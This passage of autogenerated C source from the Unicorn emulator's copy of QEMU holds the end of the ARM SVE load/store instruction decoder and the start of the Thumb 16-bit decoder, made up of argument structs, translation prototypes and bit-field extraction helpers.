(trans_LD_zprr(ctx, &u.f_rprr_load)) return true; return false; case 0x7: /* 1010010. ........ 111..... ........ */ disas_sve_extract_rpri_load_msz(ctx, &u.f_rpri_load, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* 1010010. ...0.... 111..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:958 */ u.f_rpri_load.nreg = extract32(insn, 21, 2); if (trans_LD_zpri(ctx, &u.f_rpri_load)) return true; return false; } return false; } return false; case 0x62: /* 1100010. ........ ........ ........ */ switch ((insn >> 15) & 0x1) { case 0x0: /* 1100010. ........ 0....... ........ */ switch ((insn >> 23) & 0x3) { case 0x0: /* 11000100 0....... 0....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11000100 0.0..... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:985 */ disas_sve_extract_rprr_g_load_xs_u(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 0; u.f_rprr_gather_load.scale = 0; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x1: /* 11000100 0.1..... 0....... ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 11000100 0.1..... 0....... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1013 */ if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; } return false; case 0x1: /* 11000100 1....... 0....... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:987 */ disas_sve_extract_rprr_g_load_xs_u_sc(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x2: /* 11000101 0....... 0....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:989 */ disas_sve_extract_rprr_g_load_xs_u_sc(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 2; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x3: /* 11000101 1....... 0....... ........ */ disas_sve_extract_rprr_g_load_xs_sc(ctx, &u.f_rprr_gather_load, insn); switch ((insn >> 14) & 0x1) { case 0x1: /* 11000101 1....... 01...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:991 */ u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 3; u.f_rprr_gather_load.u = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; } return false; } return false; case 0x1: /* 1100010. ........ 1....... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 1100010. .0...... 1....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 1100010. .00..... 1....... ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch (insn & 0x00006010) { case 0x00006000: /* 1100010. .00..... 111..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1016 */ if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; case 0x1: /* 1100010. .01..... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1006 */ disas_sve_extract_rpri_g_load(ctx, &u.f_rpri_gather_load, insn); u.f_rpri_gather_load.esz = 3; if (trans_LD1_zpiz(ctx, &u.f_rpri_gather_load)) return true; return false; } return false; case 0x1: /* 1100010. .1...... 1....... ........ */ switch ((insn >> 23) & 0x3) { case 0x0: /* 11000100 01...... 1....... ........ */ switch ((insn >> 21) & 0x1) { case 0x0: /* 11000100 010..... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:996 */ disas_sve_extract_rprr_g_load_u(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 0; u.f_rprr_gather_load.scale = 0; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x1: /* 11000100 011..... 1....... ........ */ disas_sve_extract_disas_sve_Fmt_66(ctx, &u.f_disas_sve32, insn); switch ((insn >> 4) & 0x1) { case 0x0: /* 11000100 011..... 1....... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1010 */ if (trans_PRF(ctx, &u.f_disas_sve32)) return true; return false; } return false; } return false; case 0x1: /* 11000100 11...... 1....... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:998 */ disas_sve_extract_rprr_g_load_u_sc(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x2: /* 11000101 01...... 1....... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1000 */ disas_sve_extract_rprr_g_load_u_sc(ctx, &u.f_rprr_gather_load, insn); u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 2; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; case 0x3: /* 11000101 11...... 1....... ........ */ disas_sve_extract_rprr_g_load_sc(ctx, &u.f_rprr_gather_load, insn); switch ((insn >> 14) & 0x1) { case 0x1: /* 11000101 11...... 11...... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1002 */ u.f_rprr_gather_load.esz = 3; u.f_rprr_gather_load.msz = 3; u.f_rprr_gather_load.u = 1; if (trans_LD1_zprz(ctx, &u.f_rprr_gather_load)) return true; return false; } return false; } return false; } return false; } return false; case 0x72: /* 1110010. ........ ........ ........ */ switch ((insn >> 13) & 0x7) { case 0x0: /* 1110010. ........ 000..... ........ */ disas_sve_extract_pd_rn_i9(ctx, &u.f_rri, insn); switch (insn & 0x01c00010) { case 0x01800000: /* 11100101 10...... 000..... ...0.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1021 */ if (trans_STR_pri(ctx, &u.f_rri)) return true; return false; } return false; case 0x2: /* 1110010. ........ 010..... ........ */ switch ((insn >> 23) & 0x3) { case 0x0: /* 11100100 0....... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1034 */ disas_sve_extract_rprr_store_esz_n0(ctx, &u.f_rprr_store, insn); u.f_rprr_store.msz = 0; if (trans_ST_zprr(ctx, &u.f_rprr_store)) return true; return false; case 0x1: /* 11100100 1....... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1036 */ disas_sve_extract_rprr_store_esz_n0(ctx, &u.f_rprr_store, insn); u.f_rprr_store.msz = 1; if (trans_ST_zprr(ctx, &u.f_rprr_store)) return true; return false; case 0x2: /* 11100101 0....... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1038 */ disas_sve_extract_rprr_store_esz_n0(ctx, &u.f_rprr_store, insn); u.f_rprr_store.msz = 2; if (trans_ST_zprr(ctx, &u.f_rprr_store)) return true; return false; case 0x3: /* 11100101 1....... 010..... ........ */ switch ((insn >> 22) & 0x1) { case 0x0: /* 11100101 10...... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1024 */ disas_sve_extract_rd_rn_i9(ctx, &u.f_rri, insn); if (trans_STR_zri(ctx, &u.f_rri)) return true; return false; case 0x1: /* 11100101 11...... 010..... ........ */ disas_sve_extract_rprr_store(ctx, &u.f_rprr_store, insn); switch ((insn >> 21) & 0x1) { case 0x1: /* 11100101 111..... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1040 */ u.f_rprr_store.msz = 3; u.f_rprr_store.esz = 3; u.f_rprr_store.nreg = 0; if (trans_ST_zprr(ctx, &u.f_rprr_store)) return true; return false; } return false; } return false; } return false; case 0x3: /* 1110010. ........ 011..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1050 */ disas_sve_extract_rprr_store(ctx, &u.f_rprr_store, insn); u.f_rprr_store.msz = extract32(insn, 23, 2); u.f_rprr_store.nreg = extract32(insn, 21, 2); u.f_rprr_store.esz = extract32(insn, 23, 2); if (trans_ST_zprr(ctx, &u.f_rprr_store)) return true; return false; case 0x4: /* 1110010. ........ 100..... ........ 
*/ disas_sve_extract_rprr_scatter_store(ctx, &u.f_rprr_scatter_store, insn); switch ((insn >> 21) & 0x3) { case 0x0: /* 1110010. .00..... 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1092 */ u.f_rprr_scatter_store.xs = 0; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 0; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x1: /* 1110010. .01..... 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1086 */ u.f_rprr_scatter_store.xs = 0; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 1; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x2: /* 1110010. .10..... 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1062 */ u.f_rprr_scatter_store.xs = 0; u.f_rprr_scatter_store.esz = 2; u.f_rprr_scatter_store.scale = 0; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x3: /* 1110010. .11..... 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1055 */ u.f_rprr_scatter_store.xs = 0; u.f_rprr_scatter_store.esz = 2; u.f_rprr_scatter_store.scale = 1; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; } return false; case 0x5: /* 1110010. ........ 101..... ........ */ switch ((insn >> 21) & 0x3) { case 0x0: /* 1110010. .00..... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1073 */ disas_sve_extract_rprr_scatter_store(ctx, &u.f_rprr_scatter_store, insn); u.f_rprr_scatter_store.xs = 2; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 0; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x1: /* 1110010. .01..... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1069 */ disas_sve_extract_rprr_scatter_store(ctx, &u.f_rprr_scatter_store, insn); u.f_rprr_scatter_store.xs = 2; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 1; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x2: /* 1110010. .10..... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1077 */ disas_sve_extract_rpri_scatter_store(ctx, &u.f_rpri_scatter_store, insn); u.f_rpri_scatter_store.esz = 3; if (trans_ST1_zpiz(ctx, &u.f_rpri_scatter_store)) return true; return false; case 0x3: /* 1110010. .11..... 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1081 */ disas_sve_extract_rpri_scatter_store(ctx, &u.f_rpri_scatter_store, insn); u.f_rpri_scatter_store.esz = 2; if (trans_ST1_zpiz(ctx, &u.f_rpri_scatter_store)) return true; return false; } return false; case 0x6: /* 1110010. ........ 110..... ........ */ disas_sve_extract_rprr_scatter_store(ctx, &u.f_rprr_scatter_store, insn); switch ((insn >> 21) & 0x3) { case 0x0: /* 1110010. .00..... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1094 */ u.f_rprr_scatter_store.xs = 1; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 0; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x1: /* 1110010. .01..... 110..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1088 */ u.f_rprr_scatter_store.xs = 1; u.f_rprr_scatter_store.esz = 3; u.f_rprr_scatter_store.scale = 1; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x2: /* 1110010. .10..... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1064 */ u.f_rprr_scatter_store.xs = 1; u.f_rprr_scatter_store.esz = 2; u.f_rprr_scatter_store.scale = 0; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; case 0x3: /* 1110010. .11..... 110..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1057 */ u.f_rprr_scatter_store.xs = 1; u.f_rprr_scatter_store.esz = 2; u.f_rprr_scatter_store.scale = 1; if (trans_ST1_zprz(ctx, &u.f_rprr_scatter_store)) return true; return false; } return false; case 0x7: /* 1110010. ........ 111..... ........ */ disas_sve_extract_rpri_store_msz(ctx, &u.f_rpri_store, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* 1110010. ...0.... 111..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1028 */ u.f_rpri_store.esz = extract32(insn, 21, 2); u.f_rpri_store.nreg = 0; if (trans_ST_zpri(ctx, &u.f_rpri_store)) return true; return false; case 0x1: /* 1110010. ...1.... 111..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:1045 */ u.f_rpri_store.nreg = extract32(insn, 21, 2); u.f_rpri_store.esz = extract32(insn, 23, 2); if (trans_ST_zpri(ctx, &u.f_rpri_store)) return true; return false; } return false; } return false; } return false; } unicorn-2.1.1/qemu/target/arm/decode-t16.inc.c000066400000000000000000001355111467524106700207750ustar00rootroot00000000000000/* This file is autogenerated by scripts/decodetree.py.
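 *
 * The layout below follows the usual decodetree output shape: argument
 * structs and trans_* callback prototypes come first, then static
 * extract helpers that pull bit fields of the 16-bit halfword into
 * those structs, and finally a single disas_t16() dispatcher that
 * switches on instruction bits until exactly one pattern matches and
 * its trans_* hook is invoked.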
*/ typedef struct { int F; int I; int im; } arg_disas_t1616; typedef struct { int cond_mask; } arg_disas_t1617; typedef struct { int imm; int nz; int rn; } arg_disas_t1618; #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic push # pragma GCC diagnostic ignored "-Wredundant-decls" # ifdef __clang__ # pragma GCC diagnostic ignored "-Wtypedef-redefinition" # endif #endif typedef arg_s_rrr_shi arg_AND_rrri; static bool trans_AND_rrri(DisasContext *ctx, arg_AND_rrri *a); typedef arg_s_rrr_shi arg_EOR_rrri; static bool trans_EOR_rrri(DisasContext *ctx, arg_EOR_rrri *a); typedef arg_s_rrr_shr arg_MOV_rxrr; static bool trans_MOV_rxrr(DisasContext *ctx, arg_MOV_rxrr *a); typedef arg_s_rrr_shi arg_ADC_rrri; static bool trans_ADC_rrri(DisasContext *ctx, arg_ADC_rrri *a); typedef arg_s_rrr_shi arg_SBC_rrri; static bool trans_SBC_rrri(DisasContext *ctx, arg_SBC_rrri *a); typedef arg_s_rrr_shi arg_TST_xrri; static bool trans_TST_xrri(DisasContext *ctx, arg_TST_xrri *a); typedef arg_s_rri_rot arg_RSB_rri; static bool trans_RSB_rri(DisasContext *ctx, arg_RSB_rri *a); typedef arg_s_rrr_shi arg_CMP_xrri; static bool trans_CMP_xrri(DisasContext *ctx, arg_CMP_xrri *a); typedef arg_s_rrr_shi arg_CMN_xrri; static bool trans_CMN_xrri(DisasContext *ctx, arg_CMN_xrri *a); typedef arg_s_rrr_shi arg_ORR_rrri; static bool trans_ORR_rrri(DisasContext *ctx, arg_ORR_rrri *a); typedef arg_s_rrrr arg_MUL; static bool trans_MUL(DisasContext *ctx, arg_MUL *a); typedef arg_s_rrr_shi arg_BIC_rrri; static bool trans_BIC_rrri(DisasContext *ctx, arg_BIC_rrri *a); typedef arg_s_rrr_shi arg_MVN_rxri; static bool trans_MVN_rxri(DisasContext *ctx, arg_MVN_rxri *a); typedef arg_ldst_rr arg_STR_rr; static bool trans_STR_rr(DisasContext *ctx, arg_STR_rr *a); typedef arg_ldst_rr arg_STRH_rr; static bool trans_STRH_rr(DisasContext *ctx, arg_STRH_rr *a); typedef arg_ldst_rr arg_STRB_rr; static bool trans_STRB_rr(DisasContext *ctx, arg_STRB_rr *a); typedef arg_ldst_rr arg_LDRSB_rr; static bool trans_LDRSB_rr(DisasContext *ctx, arg_LDRSB_rr *a); typedef arg_ldst_rr arg_LDR_rr; static bool trans_LDR_rr(DisasContext *ctx, arg_LDR_rr *a); typedef arg_ldst_rr arg_LDRH_rr; static bool trans_LDRH_rr(DisasContext *ctx, arg_LDRH_rr *a); typedef arg_ldst_rr arg_LDRB_rr; static bool trans_LDRB_rr(DisasContext *ctx, arg_LDRB_rr *a); typedef arg_ldst_rr arg_LDRSH_rr; static bool trans_LDRSH_rr(DisasContext *ctx, arg_LDRSH_rr *a); typedef arg_ldst_ri arg_STR_ri; static bool trans_STR_ri(DisasContext *ctx, arg_STR_ri *a); typedef arg_ldst_ri arg_LDR_ri; static bool trans_LDR_ri(DisasContext *ctx, arg_LDR_ri *a); typedef arg_ldst_ri arg_STRB_ri; static bool trans_STRB_ri(DisasContext *ctx, arg_STRB_ri *a); typedef arg_ldst_ri arg_LDRB_ri; static bool trans_LDRB_ri(DisasContext *ctx, arg_LDRB_ri *a); typedef arg_ldst_ri arg_STRH_ri; static bool trans_STRH_ri(DisasContext *ctx, arg_STRH_ri *a); typedef arg_ldst_ri arg_LDRH_ri; static bool trans_LDRH_ri(DisasContext *ctx, arg_LDRH_ri *a); typedef arg_ri arg_ADR; static bool trans_ADR(DisasContext *ctx, arg_ADR *a); typedef arg_s_rri_rot arg_ADD_rri; static bool trans_ADD_rri(DisasContext *ctx, arg_ADD_rri *a); typedef arg_ldst_block arg_STM; static bool trans_STM(DisasContext *ctx, arg_STM *a); typedef arg_ldst_block arg_LDM_t16; static bool trans_LDM_t16(DisasContext *ctx, arg_LDM_t16 *a); typedef arg_s_rrr_shi arg_MOV_rxri; static bool trans_MOV_rxri(DisasContext *ctx, arg_MOV_rxri *a); typedef arg_s_rrr_shi arg_ADD_rrri; static bool trans_ADD_rrri(DisasContext *ctx, arg_ADD_rrri *a); 
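/*
 * Usage sketch: a translator loop is expected to feed each fetched
 * halfword through disas_t16() and treat a false return as an
 * unallocated encoding.  The names in this sketch are illustrative
 * assumptions, not part of the generated interface:
 *
 *     uint16_t insn = fetch_halfword(ctx);    // hypothetical fetch
 *     if (!disas_t16(ctx, insn)) {
 *         unallocated_encoding(ctx);          // hypothetical fallback
 *     }
 */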
typedef arg_s_rrr_shi arg_SUB_rrri; static bool trans_SUB_rrri(DisasContext *ctx, arg_SUB_rrri *a); typedef arg_s_rri_rot arg_SUB_rri; static bool trans_SUB_rri(DisasContext *ctx, arg_SUB_rri *a); typedef arg_s_rri_rot arg_MOV_rxi; static bool trans_MOV_rxi(DisasContext *ctx, arg_MOV_rxi *a); typedef arg_s_rri_rot arg_CMP_xri; static bool trans_CMP_xri(DisasContext *ctx, arg_CMP_xri *a); typedef arg_r arg_BX; static bool trans_BX(DisasContext *ctx, arg_BX *a); typedef arg_r arg_BLX_r; static bool trans_BLX_r(DisasContext *ctx, arg_BLX_r *a); typedef arg_r arg_BXNS; static bool trans_BXNS(DisasContext *ctx, arg_BXNS *a); typedef arg_r arg_BLXNS; static bool trans_BLXNS(DisasContext *ctx, arg_BLXNS *a); typedef arg_rrr_rot arg_SXTAH; static bool trans_SXTAH(DisasContext *ctx, arg_SXTAH *a); typedef arg_rrr_rot arg_SXTAB; static bool trans_SXTAB(DisasContext *ctx, arg_SXTAB *a); typedef arg_rrr_rot arg_UXTAH; static bool trans_UXTAH(DisasContext *ctx, arg_UXTAH *a); typedef arg_rrr_rot arg_UXTAB; static bool trans_UXTAB(DisasContext *ctx, arg_UXTAB *a); typedef arg_setend arg_SETEND; static bool trans_SETEND(DisasContext *ctx, arg_SETEND *a); typedef arg_cps arg_CPS; static bool trans_CPS(DisasContext *ctx, arg_CPS *a); typedef arg_disas_t1616 arg_CPS_v7m; static bool trans_CPS_v7m(DisasContext *ctx, arg_CPS_v7m *a); typedef arg_rr arg_REV; static bool trans_REV(DisasContext *ctx, arg_REV *a); typedef arg_rr arg_REV16; static bool trans_REV16(DisasContext *ctx, arg_REV16 *a); typedef arg_rr arg_REVSH; static bool trans_REVSH(DisasContext *ctx, arg_REVSH *a); typedef arg_empty arg_YIELD; static bool trans_YIELD(DisasContext *ctx, arg_YIELD *a); typedef arg_empty arg_WFE; static bool trans_WFE(DisasContext *ctx, arg_WFE *a); typedef arg_empty arg_WFI; static bool trans_WFI(DisasContext *ctx, arg_WFI *a); typedef arg_empty arg_NOP; static bool trans_NOP(DisasContext *ctx, arg_NOP *a); typedef arg_disas_t1617 arg_IT; static bool trans_IT(DisasContext *ctx, arg_IT *a); typedef arg_i arg_HLT; static bool trans_HLT(DisasContext *ctx, arg_HLT *a); typedef arg_i arg_BKPT; static bool trans_BKPT(DisasContext *ctx, arg_BKPT *a); typedef arg_disas_t1618 arg_CBZ; static bool trans_CBZ(DisasContext *ctx, arg_CBZ *a); typedef arg_empty arg_UDF; static bool trans_UDF(DisasContext *ctx, arg_UDF *a); typedef arg_i arg_SVC; static bool trans_SVC(DisasContext *ctx, arg_SVC *a); typedef arg_ci arg_B_cond_thumb; static bool trans_B_cond_thumb(DisasContext *ctx, arg_B_cond_thumb *a); typedef arg_i arg_B; static bool trans_B(DisasContext *ctx, arg_B *a); typedef arg_i arg_BLX_suffix; static bool trans_BLX_suffix(DisasContext *ctx, arg_BLX_suffix *a); typedef arg_i arg_BL_BLX_prefix; static bool trans_BL_BLX_prefix(DisasContext *ctx, arg_BL_BLX_prefix *a); typedef arg_i arg_BL_suffix; static bool trans_BL_suffix(DisasContext *ctx, arg_BL_suffix *a); #ifdef CONFIG_PRAGMA_DIAGNOSTIC_AVAILABLE # pragma GCC diagnostic pop #endif static void disas_t16_extract_addsub_2h(DisasContext *ctx, arg_s_rrr_shi *a, uint16_t insn) { a->rm = extract32(insn, 3, 4); a->rd = deposit32(extract32(insn, 0, 3), 3, 29, extract32(insn, 7, 1)); a->rn = deposit32(extract32(insn, 0, 3), 3, 29, extract32(insn, 7, 1)); a->shim = 0; a->shty = 0; } static void disas_t16_extract_addsub_2i(DisasContext *ctx, arg_s_rri_rot *a, uint16_t insn) { a->imm = extract32(insn, 6, 3); a->rn = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->rot = 0; } static void disas_t16_extract_addsub_3(DisasContext *ctx, arg_s_rrr_shi *a, 
uint16_t insn) { a->rm = extract32(insn, 6, 3); a->rn = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->shim = 0; a->shty = 0; } static void disas_t16_extract_addsub_sp_i(DisasContext *ctx, arg_s_rri_rot *a, uint16_t insn) { a->s = 0; a->rd = 13; a->rn = 13; a->rot = 0; a->imm = times_4(ctx, extract32(insn, 0, 7)); } static void disas_t16_extract_arith_1i(DisasContext *ctx, arg_s_rri_rot *a, uint16_t insn) { a->rd = extract32(insn, 8, 3); a->imm = extract32(insn, 0, 8); a->rot = 0; a->rn = extract32(insn, 8, 3); } static void disas_t16_extract_branchr(DisasContext *ctx, arg_r *a, uint16_t insn) { a->rm = extract32(insn, 3, 4); } static void disas_t16_extract_disas_t16_Fmt_10(DisasContext *ctx, arg_ri *a, uint16_t insn) { a->rd = extract32(insn, 8, 3); a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t16_extract_disas_t16_Fmt_11(DisasContext *ctx, arg_s_rri_rot *a, uint16_t insn) { a->rd = extract32(insn, 8, 3); a->rn = 13; a->s = 0; a->rot = 0; a->imm = times_4(ctx, extract32(insn, 0, 8)); } static void disas_t16_extract_disas_t16_Fmt_21(DisasContext *ctx, arg_setend *a, uint16_t insn) { a->E = extract32(insn, 3, 1); } static void disas_t16_extract_disas_t16_Fmt_22(DisasContext *ctx, arg_cps *a, uint16_t insn) { a->A = extract32(insn, 2, 1); a->I = extract32(insn, 1, 1); a->F = extract32(insn, 0, 1); a->mode = 0; a->M = 0; a->imod = plus_2(ctx, extract32(insn, 4, 1)); } static void disas_t16_extract_disas_t16_Fmt_23(DisasContext *ctx, arg_disas_t1616 *a, uint16_t insn) { a->im = extract32(insn, 4, 1); a->I = extract32(insn, 1, 1); a->F = extract32(insn, 0, 1); } static void disas_t16_extract_disas_t16_Fmt_25(DisasContext *ctx, arg_empty *a, uint16_t insn) { } static void disas_t16_extract_disas_t16_Fmt_26(DisasContext *ctx, arg_disas_t1617 *a, uint16_t insn) { a->cond_mask = extract32(insn, 0, 8); } static void disas_t16_extract_disas_t16_Fmt_27(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = extract32(insn, 0, 6); } static void disas_t16_extract_disas_t16_Fmt_28(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = extract32(insn, 0, 8); } static void disas_t16_extract_disas_t16_Fmt_29(DisasContext *ctx, arg_disas_t1618 *a, uint16_t insn) { a->nz = extract32(insn, 11, 1); a->rn = extract32(insn, 0, 3); a->imm = times_2(ctx, deposit32(extract32(insn, 3, 5), 5, 27, extract32(insn, 9, 1))); } static void disas_t16_extract_disas_t16_Fmt_3(DisasContext *ctx, arg_s_rri_rot *a, uint16_t insn) { a->rn = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->imm = 0; a->rot = 0; } static void disas_t16_extract_disas_t16_Fmt_30(DisasContext *ctx, arg_ldst_block *a, uint16_t insn) { a->i = 0; a->b = 1; a->u = 0; a->w = 1; a->rn = 13; a->list = t16_push_list(ctx, extract32(insn, 0, 9)); } static void disas_t16_extract_disas_t16_Fmt_31(DisasContext *ctx, arg_ldst_block *a, uint16_t insn) { a->i = 1; a->b = 0; a->u = 0; a->w = 1; a->rn = 13; a->list = t16_pop_list(ctx, extract32(insn, 0, 9)); } static void disas_t16_extract_disas_t16_Fmt_32(DisasContext *ctx, arg_ci *a, uint16_t insn) { a->cond = extract32(insn, 8, 4); a->imm = times_2(ctx, sextract32(insn, 0, 8)); } static void disas_t16_extract_disas_t16_Fmt_33(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = times_2(ctx, sextract32(insn, 0, 11)); } static void disas_t16_extract_disas_t16_Fmt_34(DisasContext *ctx, arg_i *a, uint16_t insn) { a->imm = extract32(insn, 0, 11); } static void disas_t16_extract_disas_t16_Fmt_35(DisasContext *ctx, arg_i *a, uint16_t 
insn) { a->imm = sextract32(insn, 0, 11); } static void disas_t16_extract_disas_t16_Fmt_4(DisasContext *ctx, arg_s_rrrr *a, uint16_t insn) { a->rn = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->s = t16_setflags(ctx); a->rm = extract32(insn, 0, 3); a->ra = 0; } static void disas_t16_extract_extend(DisasContext *ctx, arg_rrr_rot *a, uint16_t insn) { a->rm = extract32(insn, 3, 3); a->rd = extract32(insn, 0, 3); a->rn = 15; a->rot = 0; } static void disas_t16_extract_ldst_ri_1(DisasContext *ctx, arg_ldst_ri *a, uint16_t insn) { a->imm = extract32(insn, 6, 5); a->rn = extract32(insn, 3, 3); a->rt = extract32(insn, 0, 3); a->p = 1; a->w = 0; a->u = 1; } static void disas_t16_extract_ldst_ri_2(DisasContext *ctx, arg_ldst_ri *a, uint16_t insn) { a->rn = extract32(insn, 3, 3); a->rt = extract32(insn, 0, 3); a->p = 1; a->w = 0; a->u = 1; a->imm = times_2(ctx, extract32(insn, 6, 5)); } static void disas_t16_extract_ldst_ri_4(DisasContext *ctx, arg_ldst_ri *a, uint16_t insn) { a->rn = extract32(insn, 3, 3); a->rt = extract32(insn, 0, 3); a->p = 1; a->w = 0; a->u = 1; a->imm = times_4(ctx, extract32(insn, 6, 5)); } static void disas_t16_extract_ldst_rr(DisasContext *ctx, arg_ldst_rr *a, uint16_t insn) { a->rm = extract32(insn, 6, 3); a->rn = extract32(insn, 3, 3); a->rt = 